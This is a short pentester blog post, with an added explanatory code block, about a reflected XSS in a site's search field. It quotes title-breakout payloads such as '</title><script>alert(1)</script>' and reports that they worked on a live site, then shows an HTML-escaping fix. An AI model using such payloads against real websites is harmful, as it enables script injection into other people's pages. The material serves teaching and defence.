
I was kind of looking (pentester way) at a website and I saw that they could have an XSS flaw in the search field. Inserting the string "<b>tester" in the search field, it gets reflected back, but only inside the <title> tag, like this:

<title>Cauta <b>tester – ……………</title>

This is a classic XSS, but what made this one interesting to me was the <title> tag.

<title>Cauta<script>alert(1);</script> – ……………</title>  => is not working

but

</title><script>alert(1)</script>&submit=Cauta => is working

Speaking with a friend, he also gave me an alternative: the idea of inserting the <body> tag and in this way creating a new HTML document.

So:

</title><body onload='javascript:alert(1)'>

also worked like a charm.
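Why the first payload is inert and the other two are not, as an added example that is not part of the original post: <title> content is parsed as RCDATA, so tags inside it stay text until a </title> end tag appears, and HTML-encoding the search term keeps it inside the title. The template, TAIL and all function names are constructed for illustration; the site's real markup is not known.

```javascript
// Added example. The template below is constructed; it is not the site's markup.
const TAIL = '<p>results</p>';

// Vulnerable pattern: the search term is concatenated into <title> unescaped.
function renderUnsafe(term) {
  return `<title>Cauta ${term} - example</title>${TAIL}`;
}

// Hardened pattern: HTML-encode the term before it reaches the template.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}
function renderSafe(term) {
  return `<title>Cauta ${escapeHtml(term)} - example</title>${TAIL}`;
}

// <title> content is RCDATA: the tokenizer creates no elements inside it and
// only "</title" followed by whitespace, "/" or ">" ends the element.
function parseTitle(html) {
  const open = html.toLowerCase().indexOf('<title>') + '<title>'.length;
  const end = open + /<\/title[\s/>]/i.exec(html.slice(open)).index;
  const rest = html.slice(html.indexOf('>', end) + 1);
  // brokeOut: text from the term landed after the title, where tags are parsed.
  return { titleText: html.slice(open, end), brokeOut: rest !== TAIL };
}

// Payloads quoted in the post.
const INERT = '<script>alert(1);</script>';
const BREAKOUTS = [
  '</title><script>alert(1)</script>',
  "</title><body onload='javascript:alert(1)'>",
];

// One row per payload: does it leave the title when unescaped / when escaped?
function report() {
  return [INERT, ...BREAKOUTS].map((term) => ({
    term,
    unsafe: parseTitle(renderUnsafe(term)).brokeOut,
    safe: parseTitle(renderSafe(term)).brokeOut,
  }));
}

console.log(report());
```

With encoding applied, the browser decodes &lt; and &gt; back to visible characters inside the title text, so the search term still displays as typed.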
